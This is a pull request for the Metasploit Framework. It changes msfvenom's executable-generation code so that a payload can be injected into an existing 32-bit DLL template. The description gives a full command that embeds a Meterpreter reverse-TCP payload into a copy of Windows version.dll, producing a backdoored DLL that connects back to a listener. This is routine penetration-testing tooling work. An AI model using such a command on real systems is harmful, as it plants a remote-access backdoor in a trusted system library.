### PR TITLE
Enable DLL injection in msfvenom

### DIFF
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -1606,20 +1606,10 @@ def self.to_vba(framework,code,opts={})
 
     when 'dll'
       output = case arch
-        when ARCH_X86,nil
-          if exeopts[:inject]
-            to_win32pe(framework, code, exeopts)
-          else
-            to_win32pe_dll(framework, code, exeopts)
-          end
-        when ARCH_X86_64,ARCH_X64
-          if exeopts[:inject]
-            raise RuntimeError, 'Template injection unsupported for x64 DLLs'
-          else
-            to_win64pe_dll(framework, code, exeopts)
-          end
-      end
-
+        when ARCH_X86,nil then to_win32pe_dll(framework, code, exeopts)
+        when ARCH_X86_64  then to_win64pe_dll(framework, code, exeopts)
+        when ARCH_X64     then to_win64pe_dll(framework, code, exeopts)
+        end
     when 'exe'
       output = case arch
         when ARCH_X86,nil then to_win32pe(framework, code, exeopts)

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -1604,12 +1604,22 @@ def self.to_vba(framework,code,opts={})
       exe = to_executable_fmt(framework, arch, plat, code, 'exe', exeopts)
       output = Msf::Util::EXE.to_exe_aspx(exe, exeopts)
 
-    when 'dll'
+      when 'dll'
       output = case arch
-        when ARCH_X86,nil then to_win32pe_dll(framework, code, exeopts)
-        when ARCH_X86_64  then to_win64pe_dll(framework, code, exeopts)
-        when ARCH_X64     then to_win64pe_dll(framework, code, exeopts)
-        end
+        when ARCH_X86,nil
+          if exeopts[:inject]
+            to_win32pe(framework, code, exeopts)
+          else
+            to_win32pe_dll(framework, code, exeopts)
+          end
+        when ARCH_X86_64,ARCH_X64
+          if exeopts[:inject]
+            raise RuntimeError, 'Template injection unsupported for x64 DLLs'
+          else
+            to_win64pe_dll(framework, code, exeopts)
+          end
+      end
+
     when 'exe'
       output = case arch
         when ARCH_X86,nil then to_win32pe(framework, code, exeopts)

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -469,14 +469,24 @@ require 'msf/core/exe/segment_injector'
     # Allow the user to specify their own DLL template
     set_template_default(opts, "template_x86_windows.dll")
     opts[:exe_type] = :dll
-    exe_sub_method(code,opts)
+
+    if opts[:inject]
+       return self.to_win32pe(framework, code, opts)
+    else
+      return exe_sub_method(code,opts)
+    end
   end
 
   def self.to_win64pe_dll(framework, code, opts={})
     # Allow the user to specify their own DLL template
     set_template_default(opts, "template_x64_windows.dll")
     opts[:exe_type] = :dll
-    exe_sub_method(code,opts)
+
+    if opts[:inject]
+      raise RuntimeError, 'Template injection unsupported for x64 DLLs'
+    else
+      return exe_sub_method(code,opts)
+    end
   end
 
   #
@@ -1610,6 +1620,7 @@ def self.to_vba(framework,code,opts={})
         when ARCH_X86_64  then to_win64pe_dll(framework, code, exeopts)
         when ARCH_X64     then to_win64pe_dll(framework, code, exeopts)
         end
+
     when 'exe'
       output = case arch
         when ARCH_X86,nil then to_win32pe(framework, code, exeopts)

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -1604,7 +1604,7 @@ def self.to_vba(framework,code,opts={})
       exe = to_executable_fmt(framework, arch, plat, code, 'exe', exeopts)
       output = Msf::Util::EXE.to_exe_aspx(exe, exeopts)
 
-      when 'dll'
+    when 'dll'
       output = case arch
         when ARCH_X86,nil
           if exeopts[:inject]


### PR DESCRIPTION
Using version.dll from SYSWOW64:

./msfvenom -p windows/meterpreter/reverse_tcp -x ~/version.dll -f dll -k LHOST=192.168.1.x > ~/version2.dll

These changes (or changes to this effect) went missing from https://github.com/rapid7/metasploit-framework/pull/1103
